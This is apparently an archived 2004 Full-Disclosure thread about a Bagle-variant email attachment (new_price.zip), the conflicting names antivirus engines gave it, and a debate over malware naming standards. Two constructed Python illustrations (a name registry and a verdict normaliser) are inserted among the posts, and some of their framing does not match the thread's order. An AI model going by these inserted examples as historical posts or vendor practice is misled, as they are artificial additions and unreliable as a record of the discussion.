> I agree, but having been inside it for a while and close to it for about as long before that, I don't see anything likely to compel the industry to address such issues as doing so will cost them money with no apparent return on the investment. A very large government (or group of governments) may be able to apply enough leverage through terms of purchase for its departments, so long as a naming standard the industry could
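Added example, not code from the thread or from any AV vendor: the temporary-name scheme Maarten proposes above (VENDOR-MMDDHHxy, later resolved to a definitive name), Frank's "first to ring the bell sets the name" rule from earlier in the thread, and the variable-substitution point just made, modelled as a small Python name registry. The vendor tags, sample id, timestamps and the names VendorX/VendorY are constructed for the illustration. What it shows is the indirection the thread is arguing about: if every product reports a provisional name and a lookup table maps provisional names to the canonical one, a rename after the fact is a single pointer update, and nothing about the first hours changes.

```python
"""Provisional-to-canonical malware name registry (added illustration).

Models the scheme discussed in the thread: each vendor ships detection under
its own provisional name (VENDOR-MMDDHHxy), the first vendor to announce
publicly "rings the bell" and sets the canonical name, and every provisional
name is resolved to the canonical one through a lookup table, so a later
rename is one pointer change rather than an edit of every product's
signature set and web material. All vendors, sample ids and timestamps are
constructed; nothing here is a real vendor's naming process.
"""
from dataclasses import dataclass, field
from datetime import datetime
from typing import Dict, Optional


@dataclass
class Record:
    sample_id: str                                  # hash of the sample (constructed)
    canonical: Optional[str] = None                 # set by whoever rang the bell first
    announced_by: Optional[str] = None
    provisional: Dict[str, str] = field(default_factory=dict)  # vendor -> its own name


class NameRegistry:
    def __init__(self) -> None:
        self._records: Dict[str, Record] = {}
        self._alias: Dict[str, str] = {}   # any known name -> sample_id

    @staticmethod
    def provisional_name(vendor: str, seen_at: datetime, seq: str) -> str:
        """VENDOR-MMDDHHxy: vendor tag, month/day/hour first seen, 2-char sequence."""
        return f"{vendor.upper()}-{seen_at:%m%d%H}{seq}"

    def register(self, vendor: str, sample_id: str, seen_at: datetime, seq: str) -> str:
        """A vendor ships detection under its own name; no cross-vendor coordination."""
        name = self.provisional_name(vendor, seen_at, seq)
        rec = self._records.setdefault(sample_id, Record(sample_id))
        rec.provisional[vendor] = name
        self._alias[name] = sample_id
        return name

    def ring_bell(self, vendor: str, sample_id: str, canonical: str) -> str:
        """First vendor to announce sets the canonical name; later bells are ignored."""
        rec = self._records[sample_id]
        if rec.canonical is None:
            rec.canonical, rec.announced_by = canonical, vendor
            self._alias[canonical] = sample_id
        return rec.canonical

    def resolve(self, name: str) -> Optional[str]:
        """Map any provisional name, or a superseded canonical one, to the current canonical name."""
        sample_id = self._alias.get(name)
        if sample_id is None:
            return None
        rec = self._records[sample_id]
        return rec.canonical if rec.canonical is not None else name

    def rename(self, sample_id: str, new_canonical: str) -> str:
        """Renaming after the fact: one pointer change; every old name keeps resolving."""
        rec = self._records[sample_id]
        rec.canonical = new_canonical
        self._alias[new_canonical] = sample_id
        return new_canonical


def demo() -> dict:
    """Two constructed vendors see the same constructed sample; VendorY rings the bell first."""
    reg = NameRegistry()
    sid = "sha1:0000constructed0000"
    x = reg.register("vendorx", sid, datetime(2004, 8, 12, 14), "03")   # VENDORX-08121403
    y = reg.register("vendory", sid, datetime(2004, 8, 12, 16), "01")   # VENDORY-08121601
    reg.ring_bell("vendory", sid, "MyDoom-AV")
    late = reg.ring_bell("vendorx", sid, "Mydoom.Q")   # too late; the first bell stands
    before = (reg.resolve(x), reg.resolve(y), late)
    reg.rename(sid, "Mydoom.AV")                       # later coordination: one update
    after = (reg.resolve(x), reg.resolve("MyDoom-AV"), reg.resolve("unknown-name"))
    return {"x": x, "y": y, "before": before, "after": after}


if __name__ == "__main__":
    print(demo())
```

The registry deliberately never asks a vendor to wait: register() works without knowing what anyone else has seen, which is the property Frank's bell and Maarten's temporary names both rely on. The cost that Nick points to elsewhere in the thread (collateral tied to the reported name) is what the alias table isolates: only resolve() needs to know the current canonical name.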
Re: [Full-Disclosure] (no subject)
Maarten to me:
> > However, if all AV vendors (and it would have to be all vendors or market forces would prevent it happening, so guess what is one of the largest things blocking better naming coordination?) were to agree a name perfectly before _any_ of them shipped updated detection for new viruses, it is a better than fair bet that those same outsiders would then be the ones complaining longest and loudest about how tardy AV vendors were at shipping emergency updates.
>
> There is nothing stopping AV vendors from naming freshly discovered virii with an internal naming scheme (VENDOR-MMDDHHxy) pending a central database / organisation to name the virus. Then all vendors can rename the new strain from their generic temporary name to the definitive name. This is trivial, they update virus definitions all the time, why not also update the name.

I can easily understand how someone unversed in the _market forces_ pertaining to antivirus software could hold that position, and as a theoretical solution to the problem of lack of cross-vendor naming coordination it has often been suggested even by those who know it would never work in the real world. Neat and tidy as such a solution seems, it will not, however, work. As I explained in other of my posts in this and the related "AV Naming Convention" thread, in general by far the largest cost of naming disagreement is borne by the users in the early hours of large-scale outbreaks. Thus, a solution that specifically _requires_ all vendors to use a different name until a name is agreed (no matter what this process is, it will take some _additional_ time) is, by design, an _anti-solution_ as such a solution, by design, ensures perfect naming inconsistency at the time the highest cost of naming inconsistency is borne.

Secondly, one of the greatest impediments to ongoing (as opposed to initial, outbreak-phase) naming inconsistency is that many vendors do not have internal processes robust enough to easily handle renaming.

Bearing both in mind, it is obvious that the only likely useful solution to this problem will be one that allows for the fastest _and earliest_ possible resolution of "VendorX and VendorY have both just seen samples of what is almost certainly the same thing which will be known as..." _AND_ provides an easy, even trivial, mechanism for the right folk at VendorX and VendorY to learn of this. _FURTHER_, even if such a mechanism can be implemented, it will likely be useless as much history suggests that the vendors seem unable to change (and are certainly _unwilling_ to spend the time and effort to change their internal procedures to allow for better naming and renaming flexibility) unless there is some very large external stick being held over them (such as, perhaps, some compliance requirement for AV software to be used in any branch of the US federal government and its many and varied agencies...).

> This could even be good for competition; the central authority could give credit to the first discoverer by naming the virus after the vendor who first found it (but I digress here).

No, please don't suggest such things. The PR and marketing folk in AV (as everywhere else) are already dangerously clueless about what their products do, who they do it for and the importance of their own product. Such a naming scheme would simply add years of totally stupid marketing back into an industry sector where the technical folk have fought very long and hard to rein in the stupidity of overly emotional, grossly under-informed, generally publicity-seeking to the detriment of the industry as a whole marketing moves.

> In the real world, things are very often named after their discoverers or inventors. Star systems, diseases, laws, etcetera.

And that is such a bad idea here for so many reasons I'm not going to waste my breath even trying to explain more than the above comment other than to add, much as it may not be apparent and much as it is far from perfect, the malware naming process we use is supposed to be a simple taxonomic system relating, at the broader view than "you have the virus FooBar.X", the related-ness of similar code and differentiating less similar code. Much as the current system is imperfect, any attempt to fix malware naming that involves removing the current scheme's (weak) taxonomic structure will find extremely stiff resistance from some significant segments of the industry.

> Of course, the first thing is to form that central authority, but then again lots of industries have a central authority -whether decreed by law or not- so it's not something deemed impossible.

Sure -- if someone is prepared to pay a few salaries, it would be relatively easy to set up some kind of naming authority. Of course, if this were done without _extensive_ consultation with AV developers, it is unlikely to be worth the effort as no-one will pay much attention to the authority,
Re: [Full-Disclosure] (no subject)
The appropriately-named Frank Knobbe wrote:

> Isn't the complete lack of naming standardization in the AV industry simply amazing?

...

Much as less-than-perfect naming coordination bothers me, the amazing thing is actually that names are coordinated as well as they are (though especially bad cases, such as the mish-mash of mostly generic and heuristic attempts to detect HTML-embedded vulnerability exploitation attempts such as the one you quoted, can certainly be found to suggest that there is virtually no consistency at all). Of course, outsiders throwing stones probably shouldn't be expected to understand this. However, if all AV vendors (and it would have to be all vendors or market forces would prevent it happening, so guess what is one of the largest things blocking better naming coordination?) were to agree a name perfectly before _any_ of them shipped updated detection for new viruses, it is a better than fair bet that those same outsiders would then be the ones complaining longest and loudest about how tardy AV vendors were at shipping emergency updates.

...

> Imagine that were the case in science, particularly medicine...

Or perhaps it would be better to imagine that you made a more meaningful analogy, such as asking how well you think medicine would do in maintaining naming consistency if entirely new strains and variants of viruses and pathological bacteria appeared world-wide at the rate computer malware proliferates. A little exercise of the grey cells will likely suggest that they are unlikely to do better in the short term (i.e. during the outbreak phase), but would probably do much better longer-term, as the diseases, outbreaks and treatments of biological malware tend to last _MUCH_ longer than their computer cousins.

If there was much ongoing need to coordinate names I think the AV industry would do better than it does now, but with the rate at which new variants appear being what it is, medium-term renaming and name coordination are both problematic and (generally) seen as having very little, if any, market value, so few people expend much effort on such renaming.

-- Nick FitzGerald, Computer Virus Consulting Ltd. Ph/FAX: +64 3 3529854
Re: [Full-Disclosure] (no subject)
> Isn't the complete lack of naming standardization in the AV industry simply amazing? Imagine that were the case in science, particularly medicine...

No shit. They should at least get together and come up with some common naming convention. They need to make some common naming authority; it's not difficult, we do it all the time with other software and, as mentioned, in all scientific disciplines. Otherwise, things become very convoluted for us in the know. This is irrelevant to the general population, but is necessary for the people who have to deal with these things. How about it, AV guys? (I mean to be nice here...)

Todd
Re: [Full-Disclosure] (no subject)
Todd Burroughs to Frank Knobbe:

> > Isn't the complete lack of naming standardization in the AV industry simply amazing? Imagine that were the case in science, particularly medicine...
>
> No shit. They should at least get together and come up with some common naming convention. They need to make some common naming authority, it's not difficult, we do it all the time with other software and as mentioned, in all scientific disciplines. Otherwise, things become very convoluted for us in the know. This is irrelevant to the general population, but is necessary for the people who have to deal with these things.

Believe it or not we know, and things are being done about it. The scientific disciplines and others you speak of don't have to deal with things that happen in any and all possible combinations, as often, as fast, polymorphically, metamorphically, combinatorially, etc. as the AV industry does, _and generally_ have had several generations of academic research to form, refine, toss out and start over, etc. their classification and naming systems. Still, I agree that we AV researchers could do naming better, but there is not sufficient external pressure to force the industry to try to do a better job of naming than it currently does, so it has no reason to do the hard yards that any significant improvement in naming consistency will require...

> How about it AV guys? (I mean to be nice here...)

Other than a few voices wailing within the industry, there are some much larger scale moves afoot that just may change the "there is not sufficient external pressure" factor I mentioned above, though realistically these moves may take years rather than months to produce significant improvement, but they are a start...

Regards, Nick FitzGerald
Re: [Full-Disclosure] (no subject)
> > Isn't the complete lack of naming standardization in the AV industry simply amazing? Imagine that were the case in science, particularly medicine...
>
> No shit. They should at least get together and come up with some common naming convention. They need to make some common naming authority, it's not difficult, we do it all the time with other software and as mentioned, in all scientific disciplines. Otherwise, things become very convoluted for us in the know. This is irrelevant to the general population, but is necessary for the people who have to deal with these things.

<heavy_irony> Of course, you're making the assumption that IT Security Professionals deserve/get the respect of having a formal body of knowledge recognised by Academia and Government, rather than just being a bunch of ungrateful malcontents fulminating in the wilderness instead of knuckling down to life as the hired hands of the Corporate Finance section like we bloody well should, right? </heavy_irony>

Let the flames begin. ;-)

tom.
Tom Cleary - Security Architect, CSC Perth. Tel. +61 8 9254 5345, Mobile: 0411208423, [EMAIL PROTECTED]
"In IT, acceptable solutions depend upon humans - Computers don't negotiate."
Re: [Full-Disclosure] (no subject)
i've worked within medicine in my previous life as an ER doc and guess what, there is no formal naming standardisation within it, at least not one that there is any sort of agreement over, though people have been trying for centuries to sort something out. some use latin, some use greek, some use anglicised terms, others will use their own language's interpretations of disease. google helps, but the variation between differing nations' medical terminology can lead to a total breakdown in communication when one relies on a written record. Also, some of the less obvious jargon is derived from the name of the company (that owns the patent) that makes the device that's used in the treatment of the disease: "we threw a quick austin-moore into Mrs McGinty this morning". using impenetrable, rapidly-geographically-changing terminology is part of the mechanism used to obfuscate the publicly available knowledge that is part of the (evil) process of preserving professional autonomy. not a good thing for medics to do, but it tends to be repeated in other industries as well - three letter acronym, anyone?

Frank Knobbe [EMAIL PROTECTED] Sent by: [EMAIL PROTECTED] 10/08/2004 01:06
To: Bernardo Quintero [EMAIL PROTECTED] cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] (no subject)

> On Mon, 2004-08-09 at 14:43, Bernardo Quintero wrote:
> > BitDefender 7.0/20040809 found [JS.Dword.dropper]
> > ClamWin devel-20040727/20040809 found [Trojan.JS.RunMe]
> > eTrustAV-Inoc 4641/20040728 found [JScript/IE.VM.Exploit]
> > F-Prot 3.15/20040809 found [HTML/[EMAIL PROTECTED]
> > Kaspersky 4.0.2.23/20040809 found nothing
> > McAfee 4383/20040804 found [JS/IllWill]
> > NOD32v2 1.836/20040809 found [Win32/Bagle.AI]
> > Norman 5.70.10/20040806 found [W32/Malware]
> > Panda 7.02.00/20040809 found [Fichero Sospechoso]
> > Sybari 7.5.1314/20040809 found [JS/IllWill]
> > Symantec 8.0/20040809 found nothing
> > TrendMicro 7.000/20040809 found [HTML_BAGLE.AC]
>
> Isn't the complete lack of naming standardization in the AV industry simply amazing? Imagine that were the case in science, particularly medicine... Makes for a nice game of AV bingo though...
>
> -Frank
Re: [Full-Disclosure] (no subject)
Michael Simpson [EMAIL PROTECTED] 10/08/2004 10:00:52:

> i've worked within medicine in my previous life as an ER doc and guess what there is no formal naming standardisation within it, at least not one that there is any sort of agreement over, though people have been trying for centuries to sort something out.
> -three letter acronym anyone?

I always find the adrenaline/epinephrine naming clash amusing and confusing. Does it stem from a company trademarking "adrenaline" in the USA? Because, as far as I can tell, everyone uses adrenaline as the generic term for the hormone of the same name here in the UK.

Acronyms have their own pitfalls too... I've heard of numerous cases where a derogatory and unprofessional acronym was written on/in some medical notes (PITA, TWOT etc). Perhaps it should be standard practice that when the patient asks to have his/her medical notes explained to him/her, as s/he is quite entitled under the Data Protection Act, the member of staff writing said comment should explain its medical meaning and clinical significance.

The scary part of acronyms comes with overloading. One derogatory (and very unprofessional) acronym I've heard about from a number of years ago was NFR, meant to stand for "Normal For Ridgehill" (a region with which the local hospital had some experience). NFR is more commonly used as an abbreviation for "Not For Resuscitation"; from what I understand, NFR is a quite detailed set of circumstances, changing on a frequent basis, stipulating when somebody does not need resuscitation, i.e. they are already beyond medical help.

[disclaimer: i'm not a medic, so any corrections will be educational for me too!]

Marek
Re: [Full-Disclosure] (no subject)
On Tue, 10 Aug 2004 02:02:23 EDT, Todd Burroughs said:

> No shit. They should at least get together and come up with some common naming convention. They need to make some common naming authority, it's not difficult, we do it all the time with other software and as mentioned, in all scientific disciplines.

Software gets named over days/weeks. They crank out a new name for an element every few years. These things need names in *MINUTES* - often while the various A/V companies are looking at different copies of a polymorphic, multi-attack piece of malware. 5 blind men and an elephant time... and you want them to agree on a name before they even agree they're looking at the same thing???
Re: [Full-Disclosure] (no subject)
On Tue, 2004-08-10 at 09:47, [EMAIL PROTECTED] wrote:

> Software gets named over days/weeks. They crank out a new name for an element every few years. These things need names in *MINUTES* - often while the various A/V companies are looking at different copies of a polymorphic, multi-attack piece of malware.

Hey, I didn't say it would be easy, did I?

> 5 blind men and an elephant time... and you want them to agree on a name before they even agree they're looking at the same thing???

Obviously not at time of research. But these days everyone is keeping an ear on the ground... I mean Internet... while they are doing research. Once one company, which is working on a new strain they term BigNasty, finds out 3 others are discussing this (on the Internet or private AV channels) as the SuckThis virus, then they could adopt that name to avoid confusion. I didn't say it was easy, but they could at least make an effort. Here we are a year later and still call it Bagle or Beagle, either one. I'm still confused if MyDoom-O and MyDoom-M are the same thing or not.

BTW: Perhaps the analogy to medicine was misplaced. I just thought in terms of diseases. How many different names do we have for ...say... chicken pox or colitis or diabetes? Imagine you had 5 different names for the flu. I could come up with a dozen Monty Python sketches taking place in the doctor's office.

I didn't say it was easy, but we should encourage the AV industry to work towards such a standardization. It may even be beneficial for them.

Sing with me, Valdis: I say tomato, you say tomato, I say potato, you say potato, I say Beagle, you say Bagle, and others are calling it something else.

Regards, Frank (throwing rocks at the glass palace)
Re: [Full-Disclosure] (no subject)
--On Monday, August 09, 2004 07:06:11 PM -0500 Frank Knobbe [EMAIL PROTECTED] wrote:

> Isn't the complete lack of naming standardization in the AV industry simply amazing? Imagine that were the case in science, particularly medicine...

Getting the AV industry to agree on virus names is about as likely as getting a government to do anything beneficial for its citizens.

Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer, The University of Texas at Dallas. AVIEN Founding Member. http://www.utdallas.edu/ir/security/
Re: [Full-Disclosure] (no subject)
On Tue, 10 Aug 2004 10:13:55 CDT, Frank Knobbe said:

> ... in terms of diseases. How many different names do we have for ...say... chicken pox or colitis or diabetes? Imagine you had 5 different names for the flu.

Diabetes comes in Type 1 and Type 2, which are quite different (in one, your pancreas quits producing insulin; in the other, the insulin is produced, but not utilized well by your body). Influenza comes in many different strains as well - in fact, predicting which strains will be prevalent and should be included in flu shots is a major challenge. Strains are usually named after the closest major city to the first known outbreak, although the one that got loose in 1918 is a special case... As you were saying?
Re: [Full-Disclosure] (no subject)
On Tue, 2004-08-10 at 10:25, [EMAIL PROTECTED] wrote:

> Diabetes comes in Type 1 and Type 2, which are quite different (in one, your pancreas quits producing insulin, in the other, the insulin is produced, but not utilized well by your body).

I know, my wife has type 2. They still call it diabetes.

> As you were saying?

If you missed the point, let me repeat it: I believe different names for the same virus confuse consumers and industry alike. I'd like to urge the industry to start adopting a common naming convention.
Re: [Full-Disclosure] (no subject)
On Tue, 10 Aug 2004 10:33:50 CDT, Frank Knobbe said:

> I know, my wife has type 2. They still call it diabetes.

By that logic, we have bagle, agobot, netsky, and mydoom. No need for variant names, and no need for a name for an attack of pancreatic cancer that knocks out your insulin production, because that's just diabetes too.
Re: [Full-Disclosure] (no subject)
On Tue, 10 Aug 2004 11:44:57 -0400, [EMAIL PROTECTED] wrote:

> On Tue, 10 Aug 2004 10:33:50 CDT, Frank Knobbe said:
> > I know, my wife has type 2. They still call it diabetes.
>
> By that logic, we have bagle, agobot, netsky, and mydoom. No need for variant names, and no need for a name for an attack of pancreatic cancer that knocks out your insulin production, because that's just diabetes too.

But that's the point: first of all there's Beagle/Bagle/Alu, not to mention the variants that *do* exist. Type I and II diabetes (and yes, my wife too) mean the same thing to any doctor -- whereas different folks have different variant names for the same thing. It would be more akin to some doctors reversing Type I and Type II or even adding Type III or IV without any standardization with anyone else.

That said, it's clear that the answers for antivirus/malware and medicine cannot be the same due to the speed of response needed, as you and others point out. Some type of standardization would be great, but it can't slow down response times.

-- Kyle Maxwell [EMAIL PROTECTED]
Re: [Full-Disclosure] (no subject)
A quick Googling on "Diabetes Type I" and "Diabetes Type II" shows they are indeed different, and their difference is very clear. (See http://www.lef.org/protocols/prtcl-042.shtml for example.) As common mortals, most of us don't have a clue about that (and don't need to, unless we are somehow exposed to diabetes or interested in it). But honestly, I can't imagine a medical doctor not knowing the difference...

The same is true for computer viruses: people don't care and shouldn't care about virus naming; what they need is timely protection. But it's way different when it comes to the AV industry and all the ones who are somewhat involved in this matter.

Cheers, Iñigo Koch, Red Segura

- Original Message - From: Kyle Maxwell [EMAIL PROTECTED] To: [EMAIL PROTECTED] Cc: Frank Knobbe [EMAIL PROTECTED]; [EMAIL PROTECTED] Sent: Tuesday, August 10, 2004 1:00 PM Subject: Re: [Full-Disclosure] (no subject)

> But that's the point: first of all there's Beagle/Bagle/Alu, not to mention the variants that *do* exist. Type I and II diabetes (and yes, my wife too) mean the same thing to any doctor -- whereas different folks have different variant names for the same thing. It would be more akin to some doctors reversing Type I and Type II or even adding Type III or IV without any standardization with anyone else.
>
> That said, it's clear that the answers for antivirus/malware and medicine cannot be the same due to the speed of response needed, as you and others point out. Some type of standardization would be great but it can't slow down response times.
>
> -- Kyle Maxwell [EMAIL PROTECTED]
RE: [Full-Disclosure] (no subject)
DNA matching for real diseases is at least more accurate than string matching for computer viruses. Sig-based AV scanning will always be behind on variants. If I can take a virus, change a line in it and infect 100 people without an AV product even winking, then things can be changed. But maybe I am the only person that wants to be protected? We have made the public more scared of 12 year old script kiddies than of real hackers working with an organized crime family. Funny the way the world works. =)

-----Original Message----- From: [EMAIL PROTECTED] On Behalf Of [EMAIL PROTECTED] Sent: Tuesday, August 10, 2004 10:45 AM To: Frank Knobbe Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] (no subject)

> On Tue, 10 Aug 2004 10:33:50 CDT, Frank Knobbe said:
> > I know, my wife has type 2. They still call it diabetes.
>
> By that logic, we have bagle, agobot, netsky, and mydoom. No need for variant names, and no need for a name for an attack of pancreatic cancer that knocks out your insulin production, because that's just diabetes too.
RE: [Full-Disclosure] (no subject)
Did anyone see that article about how one of the latest MyDooms wasn't a MyDoom at all, but they wanted to keep the name to avoid confusion? =) Can't find the article, plus it is lunch time.

Listen, all AV companies name MyDoom "MyDoom"; how hard would it be to get the variant name to be somewhat equal? Is the letter in front or at the back? Is there a W32 in the name? Do mass mailers have @MM... umm, nope?

-----Original Message----- From: [EMAIL PROTECTED] On Behalf Of Frank Knobbe Sent: Tuesday, August 10, 2004 10:14 AM To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] (no subject)

> Obviously not at time of research. But these days everyone is keeping an ear on the ground... I mean Internet... while they are doing research. Once one company, which is working on a new strain they term BigNasty, finds out 3 others are discussion this (on the Internet or private AV channels) as the SuckThis virus, then they could adopt that name to avoid confusion. I didn't say it was easy, but they could at least make an effort. Here we are a year later and still call it Bagle or Beagle, either one. I'm still confused if MyDoom-O and MyDoom-M are the same thing or not.
>
> BTW: Perhaps the analogy to medicine was misplaced. I just thought in term of diseases. How many different names do we have for ...say... chicken pox or colitis or diabetes? Imagine you had 5 different names for the flu. I could come up with a dozen Monty Python sketches taking place in the doctors office. I didn't say it was easy, but we should encourage the AV industry to work towards such a standardization. It may even be beneficial for them.
>
> Regards, Frank (throwing rocks at the glass palace)
Re: [Full-Disclosure] (no subject) (!!! (complement))
Definition for 'cracker' (German): http://www.net-lexikon.de/Cracker.html

[Translated from the German:] From English "to crack", German "knacken". A cracker is a person who breaks into someone else's computer or computer network without authorisation. A distinction is sometimes drawn between hackers and crackers: whereas hackers confine themselves to spying out other people's data, crackers also alter that data and thereby cause damage to the computers or computer networks they have broken into. Data alteration (§ 303a StGB) and computer sabotage (§ 303b StGB) are punishable under German criminal law.
RE: [Full-Disclosure] (no subject)
http://isc.sans.org/
http://www.virustotal.com/xhtml/index_en.html

-----Original Message----- From: [EMAIL PROTECTED] On Behalf Of Jonathan Grotegut Sent: Monday, August 09, 2004 3:04 PM To: Full-disclosure Subject: RE: [Full-Disclosure] (no subject)

> (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get hit pretty hard with this email. I am unable to find anything on it; from my VERY limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet?
>
> Jonathan Grotegut
RE: [Full-Disclosure] (no subject)
(In regards to new_price.zip file attachment) Anyone have any idea what this is? We had some clients just get hit pretty hard with this email. I am unable to find anything on it; from my VERY limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet?

Jonathan Grotegut
Re: [Full-Disclosure] (no subject)
> (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get hit pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet?

http://www.incidents.org/diary.php?date=2004-08-09

Scan results (http://www.virustotal.com)
File: price.zip
Date: 08/09/2004 21:41:30

BitDefender 7.0/20040809 found [JS.Dword.dropper]
ClamWin devel-20040727/20040809 found [Trojan.JS.RunMe]
eTrustAV-Inoc 4641/20040728 found [JScript/IE.VM.Exploit]
F-Prot 3.15/20040809 found [HTML/[EMAIL PROTECTED]
Kaspersky 4.0.2.23/20040809 found nothing
McAfee 4383/20040804 found [JS/IllWill]
NOD32v2 1.836/20040809 found [Win32/Bagle.AI]
Norman 5.70.10/20040806 found [W32/Malware]
Panda 7.02.00/20040809 found [Fichero Sospechoso]
Sybari 7.5.1314/20040809 found [JS/IllWill]
Symantec 8.0/20040809 found nothing
TrendMicro 7.000/20040809 found [HTML_BAGLE.AC]
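The scan listing above is the "AV bingo" the rest of this thread argues about: twelve engines, three of which agree that the sample is Bagle (under three different variant letters), several generic or heuristic verdicts, and two misses. The following Python is an added example, not code posted by anyone in this thread or shipped by VirusTotal or any vendor. It normalises verdict strings into a (family, variant) pair so that "Win32/Bagle.AI", "HTML_BAGLE.AC" and "I-Worm.Bagle.al" fall into one bucket while generic verdicts such as "W32/Malware" or "Fichero Sospechoso" are set aside, and then reports which family most engines agree on. The separator rules, the NOISE and GENERIC token lists, and the SCAN sample (transcribed from the listing above plus the later Kaspersky name reported in this thread) are assumptions constructed for the example; real engines' conventions differ and the lists would need tuning for any other set of engines.

```python
"""Normalise antivirus verdict strings into (family, variant) so that
'Win32/Bagle.AI', 'HTML_BAGLE.AC' and 'I-Worm.Bagle.al' land in one
bucket and generic/heuristic verdicts are kept apart.

The token lists and separator rules below are this example's own
assumptions, not any vendor's documented naming scheme."""
import re
from collections import Counter, defaultdict

# Platform / type / behaviour tokens that do not name a family (assumed list).
NOISE = {
    "win32", "w32", "win", "html", "js", "jscript", "vbs", "i", "worm",
    "trojan", "tr", "troj", "dropper", "downloader", "dldr", "backdoor",
    "bdr", "virus", "mm",
}
# Tokens marking a generic or heuristic verdict with no family at all (assumed).
GENERIC = {"malware", "generic", "gen", "heur", "suspicious", "sospechoso",
           "exploit", "nothing", "unknown"}

# A variant suffix: one to three letters (AI, AC, al) or a short number (1).
VARIANT_RE = re.compile(r"^[a-z]{1,3}$|^\d{1,3}$")
SPLIT_RE = re.compile(r"[/._\-@\s]+")   # every separator the engines above use


def parse_name(name):
    """Return (family, variant) for one verdict string: lower-cased family,
    upper-cased variant.  (None, None) means generic/heuristic or no detection."""
    tokens = [t for t in SPLIT_RE.split(name.strip().lower()) if t]
    if not tokens or any(t in GENERIC for t in tokens):
        return None, None
    family, variant = None, None
    for tok in tokens:
        if family is None:
            if tok not in NOISE:
                family = tok          # first non-noise token names the family
            continue
        if tok not in NOISE and VARIANT_RE.match(tok):
            variant = tok.upper()     # first variant-looking token after it
            break
    return family, variant


def group_by_family(results):
    """results: iterable of (engine, verdict).
    Returns {family: {engine: variant}}; generic verdicts sit under key None."""
    groups = defaultdict(dict)
    for engine, verdict in results:
        family, variant = parse_name(verdict)
        groups[family][engine] = variant
    return dict(groups)


def consensus(results):
    """(family, count) for the family most engines agree on, ignoring generic
    verdicts; (None, 0) if nobody names a family."""
    counts = Counter(f for f, _ in (parse_name(v) for _, v in results) if f)
    return counts.most_common(1)[0] if counts else (None, 0)


# Constructed sample: the engine/verdict pairs quoted in this thread for
# new_price.zip, plus the later Kaspersky name reported in a follow-up.
SCAN = [
    ("BitDefender", "JS.Dword.dropper"),
    ("ClamWin", "Trojan.JS.RunMe"),
    ("eTrustAV-Inoc", "JScript/IE.VM.Exploit"),
    ("Kaspersky", "nothing"),
    ("McAfee", "JS/IllWill"),
    ("NOD32v2", "Win32/Bagle.AI"),
    ("Norman", "W32/Malware"),
    ("Panda", "Fichero Sospechoso"),
    ("Sybari", "JS/IllWill"),
    ("Symantec", "nothing"),
    ("TrendMicro", "HTML_BAGLE.AC"),
    ("Kaspersky (later update)", "I-Worm.Bagle.al"),
]

if __name__ == "__main__":
    for family, engines in sorted(group_by_family(SCAN).items(),
                                  key=lambda kv: (kv[0] is None, kv[0] or "")):
        print(f"{family or '(generic / no detection)'}: {engines}")
    print("consensus:", consensus(SCAN))
```

Run on the sample, the grouping puts NOD32, Trend Micro and the updated Kaspersky signature under "bagle" (variants AI, AC and AL), McAfee and Sybari under "illwill", and five engines under the generic bucket, so the consensus family is Bagle with three votes. The point for a responder is that family agreement is worth reading off a scan like this, whereas the variant letters are vendor-local and should not be compared across engines.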
RE: [Full-Disclosure] (no subject)
I am seeing a lot of them too. Just had a call from my e-mail people. I have one that is new_price.zip (5KB). There appear to be some people on FD that are infected and we are getting a lot on my end.

-----Original Message----- From: [EMAIL PROTECTED] On Behalf Of Jonathan Grotegut Sent: Monday, August 09, 2004 2:04 PM To: Full-disclosure Subject: RE: [Full-Disclosure] (no subject)

> (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get hit pretty hard with this email. I am unable to find anything on it; from my VERY limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet?
>
> Jonathan Grotegut
RE: [Full-Disclosure] (no subject)
Discovery Date: 8/10/2004 (PHL)
Origin: USA
Description (updated: 8/9/2004 11:03:26 AM)

There are reports now in the USA of a malware spreading via email. The file, price.exe, is spread as a ZIP file, and is included in a supposedly manually-spammed email. This price.exe file is a downloader and attempts to download a file named 2.jpg from different sites. The sites are currently inaccessible at the time of this writing. Infected customers also report a file named windll.exe running in the system. TrendLabs is still currently analyzing the files and will soon post a more detailed analysis.

EPS Deliverables: Pattern OPR 953 for WORM_BAGLE.AC - Pattern under QA Testing 8/9/2004 11:23:44 AM

Thank you,
Fooks, Lynn

Bart Lansing, Manager, Desktop Services, Kohl's IT, 262-703-2911

[EMAIL PROTECTED] wrote on 08/09/2004 02:03:54 PM:

> (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get hit pretty hard with this email. I am unable to find anything on it; from my VERY limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet?
>
> Jonathan Grotegut
Re: [Full-Disclosure] (no subject)
Kaspersky detects it as I-Worm.Bagle.al

Todd Towles wrote:

> I am seeing a lot of them too. Just had a call from my e-mail people. I have one that is new_price.zip (5KB). There appear to be some people on FD that are infected and we are getting a lot on my end.
>
> -----Original Message----- From: [EMAIL PROTECTED] On Behalf Of Jonathan Grotegut Sent: Monday, August 09, 2004 2:04 PM To: Full-disclosure Subject: RE: [Full-Disclosure] (no subject)
>
> > (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get hit pretty hard with this email. I am unable to find anything on it; from my VERY limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet?
> >
> > Jonathan Grotegut
RE: [Full-Disclosure] (no subject)
On Mon, August 9, 2004 12:03 pm, Jonathan Grotegut said:

> (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get hit pretty hard with this email. I am unable to find anything on it; from my VERY limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet?

I've seen several dozen of them today... getting pretty annoying. No other info, though. :|

-Eric
-- arctic bears - email and dns services http://www.arcticbears.com
Re: [Full-Disclosure] (no subject)
